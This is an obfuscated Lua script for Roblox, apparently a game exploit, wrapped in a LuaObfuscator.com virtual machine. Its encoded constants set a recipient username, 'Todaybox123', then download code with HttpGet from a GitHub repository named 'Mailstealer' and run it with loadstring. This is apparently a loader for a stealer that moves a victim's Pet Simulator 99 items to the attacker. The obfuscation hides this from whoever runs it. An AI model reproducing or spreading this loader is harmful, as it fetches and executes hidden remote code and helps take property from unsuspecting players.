--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v69=0;while true do if (v69==0) then v19=v0(v3(v30,1,1));return "";end end else local v70=v2(v0(v30,16));if v19 then local v77=0;local v78;while true do if (v77==1) then return v78;end if (v77==0) then v78=v5(v70,v19);v19=nil;v77=1;end end else return v70;end end end);local function v20(v31,v32,v33)if v33 then local v71=568 -(367 + 201) ;local v72;while true do if (v71==(0 -0)) then v72=(v31/((8 -6)^(v32-(1 + 0))))%((5 -3)^(((v33-(1 -0)) -(v32-(2 -(118 -(32 + 85))))) + ((861 + 17) -(282 + 595)))) ;return v72-(v72%(1638 -(338 + 1185 + 114))) ;end end else local v73=(2 + (957 -(892 + 65)))^(v32-(1 -0)) ;return (((v31%(v73 + v73))>=v73) and (620 -(555 + 64))) or (931 -(857 + 74)) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (4 -2) );v18=v18 + (3 -1) ;return (v36 * (469 -213)) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + (353 -(64 + 23 + 263)) );v18=v18 + 4 ;return (v40 * (16777396 -(67 + 113))) + (v39 * (48056 + 17480)) + (v38 * (628 -372)) + v37 ;end local function v24()local v41=v23();local v42=v23();local v43=1;local v44=(v20(v42,1 + 0 ,79 -(209 -150) ) * ((6 -(863 -(814 + 45)))^(984 -((1975 -1173) + 150)))) + v41 ;local v45=v20(v42,56 -35 ,55 -24 );local v46=((v20(v42,102 -70 )==(1 + 0 + 0)) and  -(998 -(915 + 82))) or ((156 + 283) -(145 + 293)) ;if (v45==(0 -(885 -(261 + 624)))) then if (v44==0) then return v46 * 0 ;else v45=1 + 0 ;v43=0 -0 ;end elseif (v45==(651 + 1396)) then return ((v44==(1187 -(1069 + 118))) and (v46 * ((2 -1)/(0 -0)))) or (v46 * NaN) ;end return v8(v46,v45-(178 + (1501 -656)) ) * (v43 + (v44/((2 + 0)^(92 -40)))) ;end local function v25(v47)local v48;if  not v47 then v47=v23();if (v47==(1080 -(1020 + 60))) then return "";end end v48=v3(v16,v18,(v18 + v47) -(1424 -(630 + 793)) );v18=v18 + v47 ;local v49={};for v67=1, #v48 do v49[v67]=v2(v1(v3(v48,v67,v67)));end return v6(v49);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v50=0;local v51;local v52;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (v50~=(3 -1)) then else v55=nil;v56=nil;v50=3;end if (4==v50) then v59=nil;while true do if (v51==(0 -0)) then local v96=0;while true do if (1==v96) then v51=1 + 0 ;break;end if (v96~=(0 -0)) then else v52=0;v53=nil;v96=1252 -(721 + 530) ;end end end if (v51~=4) then else while true do if (v52==0) then local v103=0;local v104;while true do if (v103==(1271 -(945 + 326))) then v104=0 -0 ;while true do if (v104~=(1 + 0)) then else v52=1;break;end if (v104~=(700 -(271 + 429))) then else local v147=0 + 0 ;while true do if (1==v147) then v104=1501 -(1408 + 92) ;break;end if (v147==(1086 -(461 + 625))) then v53=0;v54=nil;v147=1;end end end end break;end end end if ((1289 -(993 + 295))==v52) then v55=nil;v56=nil;v52=2;end if (v52~=3) then else v59=nil;while true do local v105=0;local v106;while true do if (v105==0) then v106=0;while true do if (0~=v106) then else local v155=0;local v156;while true do if (v155~=(0 + 0)) then else v156=1171 -(418 + 753) ;while true do if (v156~=0) then else local v173=0 + 0 ;while true do if ((0 + 0)==v173) then if (v53==(0 + 0)) then local v174=0 + 0 ;local v175;while true do if (v174==(529 -(406 + 123))) then v175=0;while true do if (v175~=0) then else local v192=1769 -(1749 + 20) ;while true do if (v192~=(0 + 0)) then else v54={};v55={};v192=1;end if (v192==(1323 -(1249 + 73))) then v175=1;break;end end end if (v175==(1 + 0)) then v56={};v53=1;break;end end break;end end end if (v53~=(1148 -(466 + 679))) then else local v176=0;local v177;local v178;while true do if (v176~=0) then else v177=0;v178=nil;v176=2 -1 ;end if (v176==(2 -1)) then while true do if (v177==0) then v178=0;while true do if (v178==0) then local v193=1900 -(106 + 1794) ;local v194;while true do if (v193==(0 + 0)) then v194=0;while true do if (v194~=(0 + 0)) then else local v205=0;while true do if (v205~=0) then else for v210=1,v23() do v55[v210-1 ]=v28();end return v57;end end end end break;end end end end break;end end break;end end end v173=1;end if ((2 -1)==v173) then v156=2 -1 ;break;end end end if (v156==(115 -(4 + 110))) then v106=585 -(57 + 527) ;break;end end break;end end end if (v106==(1428 -(41 + 1386))) then if (v53==(104 -(17 + 86))) then local v165=0;local v166;local v167;while true do if (v165~=0) then else v166=0 + 0 ;v167=nil;v165=1 -0 ;end if (v165~=(2 -1)) then else while true do if (v166~=0) then else v167=166 -(122 + 44) ;while true do if (v167==(1 -0)) then v59={};v53=6 -4 ;break;end if (v167~=(0 + 0)) then else v57={v54,v55,nil,v56};v58=v23();v167=1 -0 ;end end break;end end break;end end end if (v53~=(67 -(30 + 35))) then else local v168=0 + 0 ;local v169;local v170;while true do if (v168==1) then while true do if (v169==(1257 -(1043 + 214))) then v170=0;while true do if (v170~=(0 -0)) then else local v179=0;while true do if (0==v179) then for v186=1213 -(323 + 889) ,v58 do local v187=0 -0 ;local v188;local v189;local v190;local v191;while true do if ((582 -(361 + 219))==v187) then while true do if (v188==1) then v191=nil;while true do if (0==v189) then local v202=320 -(53 + 267) ;local v203;while true do if (0==v202) then v203=0;while true do if (v203~=0) then else local v212=0 + 0 ;while true do if (v212~=(413 -(15 + 398))) then else v190=v21();v191=nil;v212=983 -(18 + 964) ;end if (v212==(3 -2)) then v203=1 + 0 ;break;end end end if ((1 + 0)==v203) then v189=851 -(20 + 830) ;break;end end break;end end end if (v189==(1 + 0)) then if (v190==1) then v191=v21()~=0 ;elseif (v190==2) then v191=v24();elseif (v190==3) then v191=v25();end v59[v186]=v191;break;end end break;end if (v188~=0) then else local v195=126 -(116 + 10) ;local v196;while true do if (v195==0) then v196=0 + 0 ;while true do if (v196~=(739 -(542 + 196))) then else v188=1 -0 ;break;end if (v196~=(0 + 0)) then else v189=0 + 0 ;v190=nil;v196=1;end end break;end end end end break;end if ((1 + 0)~=v187) then else v190=nil;v191=nil;v187=2;end if (v187~=(0 -0)) then else v188=0 -0 ;v189=nil;v187=1552 -(1126 + 425) ;end end end v57[408 -(118 + 287) ]=v21();v179=3 -2 ;end if (v179==1) then v170=1122 -(118 + 1003) ;break;end end end if ((2 -1)==v170) then for v180=1,v23() do local v181=0;local v182;local v183;local v184;while true do if (v181==0) then v182=377 -(142 + 235) ;v183=nil;v181=4 -3 ;end if (v181~=1) then else v184=nil;while true do if (v182==0) then v183=0;v184=nil;v182=1;end if (v182==1) then while true do if (v183~=(0 + 0)) then else v184=v21();if (v20(v184,1,1)==(977 -(553 + 424))) then local v197=0;local v198;local v199;local v200;local v201;while true do if (v197==(1 -0)) then v200=nil;v201=nil;v197=2 + 0 ;end if ((2 + 0)==v197) then while true do if (3==v198) then if (v20(v200,2 + 1 ,2 + 1 )==(1 + 0)) then v201[4]=v59[v201[4]];end v54[v180]=v201;break;end if (v198==2) then local v207=0;while true do if (v207==(0 -0)) then local v215=0;while true do if (v215==(0 -0)) then if (v20(v200,1,2 -1 )~=(1 + 0)) then else v201[9 -7 ]=v59[v201[2]];end if (v20(v200,755 -(239 + 514) ,2)==(1 + 0)) then v201[3]=v59[v201[1332 -(797 + 532) ]];end v215=1;end if ((1 + 0)==v215) then v207=1 + 0 ;break;end end end if (v207==(2 -1)) then v198=3;break;end end end if (v198~=(1203 -(373 + 829))) then else local v208=731 -(476 + 255) ;while true do if (v208==(1130 -(369 + 761))) then v201={v22(),v22(),nil,nil};if (v199==(238 -(64 + 174))) then local v216=0 + 0 ;while true do if ((0 -0)==v216) then v201[339 -(144 + 192) ]=v22();v201[4]=v22();break;end end elseif (v199==(217 -(42 + 174))) then v201[3]=v23();elseif (v199==2) then v201[3 + 0 ]=v23() -((2 + 0)^16) ;elseif (v199==3) then local v225=0;local v226;while true do if (v225==(0 + 0)) then v226=1504 -(363 + 1141) ;while true do if (v226==(1580 -(1183 + 397))) then v201[3]=v23() -(2^16) ;v201[4]=v22();break;end end break;end end end v208=2 -1 ;end if (v208~=(1 + 0)) then else v198=2;break;end end end if (v198==(0 + 0)) then local v209=0;while true do if (v209==0) then v199=v20(v184,2,3);v200=v20(v184,4,6);v209=1;end if (v209==(1976 -(1913 + 62))) then v198=1 + 0 ;break;end end end end break;end if (v197~=(0 -0)) then else v198=0;v199=nil;v197=1;end end end break;end end break;end end break;end end end v53=1936 -(565 + 1368) ;break;end end break;end end break;end if (v168==(0 -0)) then v169=0;v170=nil;v168=1662 -(1477 + 184) ;end end end break;end end break;end end end break;end if ((2 -0)~=v52) then else v57=nil;v58=nil;v52=3;end end break;end if (v51~=3) then else local v97=0 + 0 ;while true do if (v97==1) then v51=4;break;end if (v97~=(856 -(564 + 292))) then else v58=nil;v59=nil;v97=1;end end end if (v51~=2) then else v56=nil;v57=nil;v51=4 -1 ;end if (v51==(2 -1)) then local v98=304 -(244 + 60) ;while true do if (v98==0) then v54=nil;v55=nil;v98=1;end if (v98~=1) then else v51=2;break;end end end end break;end if (v50==(1 + 0)) then v53=nil;v54=nil;v50=2;end if (v50==(479 -(41 + 435))) then v57=nil;v58=nil;v50=4;end if (v50~=(1001 -(938 + 63))) then else v51=0 + 0 ;v52=nil;v50=1126 -(936 + 189) ;end end end local function v29(v60,v61,v62)local v63=0;local v64;local v65;local v66;while true do if (v63==1) then v66=v60[3];return function(...)local v79=v64;local v80=v65;local v81=v66;local v82=v27;local v83=1;local v84= -1;local v85={};local v86={...};local v87=v12("#",...) -1 ;local v88={};local v89={};for v93=0,v87 do if (v93>=v81) then v85[v93-v81 ]=v86[v93 + 1 ];else v89[v93]=v86[v93 + 1 ];end end local v90=(v87-v81) + 1 ;local v91;local v92;while true do v91=v79[v83];v92=v91[1];if (v92<=5) then if (v92<=2) then if (v92<=0) then do return;end elseif (v92==1) then if (v89[v91[2]]==v91[4]) then v83=v83 + 1 ;else v83=v91[3];end else local v109;local v110,v111;local v112;local v113;v62[v91[3]]=v89[v91[2]];v83=v83 + 1 ;v91=v79[v83];if ((v91[3]=="_ENV") or (v91[3]=="getfenv")) then v89[v91[2]]=v62;else v89[v91[2]]=v62[v91[3]];end v83=v83 + 1 ;v91=v79[v83];if ((v91[3]=="_ENV") or (v91[3]=="getfenv")) then v89[v91[2]]=v62;else v89[v91[2]]=v62[v91[3]];end v83=v83 + 1 ;v91=v79[v83];v113=v91[2];v112=v89[v91[3]];v89[v113 + 1 ]=v112;v89[v113]=v112[v91[4]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v91[3];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v91[3]~=0 ;v83=v83 + 1 ;v91=v79[v83];v113=v91[2];v110,v111=v82(v89[v113](v13(v89,v113 + 1 ,v91[3])));v84=(v111 + v113) -1 ;v109=0;for v140=v113,v84 do v109=v109 + 1 ;v89[v140]=v110[v109];end v83=v83 + 1 ;v91=v79[v83];v113=v91[2];v89[v113]=v89[v113](v13(v89,v113 + 1 ,v84));v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]();v83=v83 + 1 ;v91=v79[v83];v83=v91[3];end elseif (v92<=3) then if ((v91[3]=="_ENV") or (v91[3]=="getfenv")) then v89[v91[2]]=v62;else v89[v91[2]]=v62[v91[3]];end elseif (v92>4) then v62[v91[3]]=v89[v91[2]];else for v143=v91[2],v91[3] do v89[v143]=nil;end end elseif (v92<=8) then if (v92<=6) then local v107=0;local v108;while true do if (v107==0) then v108=v91[2];v89[v108]=v89[v108](v13(v89,v108 + 1 ,v84));break;end end elseif (v92>7) then v83=v91[3];else local v129=0;local v130;local v131;while true do if (v129==0) then v130=v91[2];v131=v89[v91[3]];v129=1;end if (v129==1) then v89[v130 + 1 ]=v131;v89[v130]=v131[v91[4]];break;end end end elseif (v92<=10) then if (v92>9) then v89[v91[2]]();else v89[v91[2]]=v91[3];end elseif (v92==11) then local v134=0;local v135;local v136;local v137;local v138;while true do if (v134==0) then v135=v91[2];v136,v137=v82(v89[v135](v13(v89,v135 + 1 ,v91[3])));v134=1;end if (v134==2) then for v163=v135,v84 do local v164=0;while true do if (v164==0) then v138=v138 + 1 ;v89[v163]=v136[v138];break;end end end break;end if (v134==1) then v84=(v137 + v135) -1 ;v138=0;v134=2;end end else v89[v91[2]]=v91[3]~=0 ;end v83=v83 + 1 ;end end;end if (0==v63) then v64=v60[1];v65=v60[2];v63=1;end end end return v29(v28(),{},v17)(...);end v15("LOL!073O00028O0003043O0075736572030B3O00546F646179626F78313233030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403453O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F6D2O61726C2O6F77312F4D61696C737465616C65722F6D61696E2F70732O392E74787400163O0012093O00014O0004000100013O0026013O0002000100010004083O00020001001209000100013O00260100010005000100010004083O00050001001209000200033O001202000200023O00122O000200043O00122O000300053O00202O00030003000600122O000500076O000600016O000300066O00023O00024O00020001000100044O001500010004083O000500010004083O001500010004083O000200016O00017O00",v9(),...);
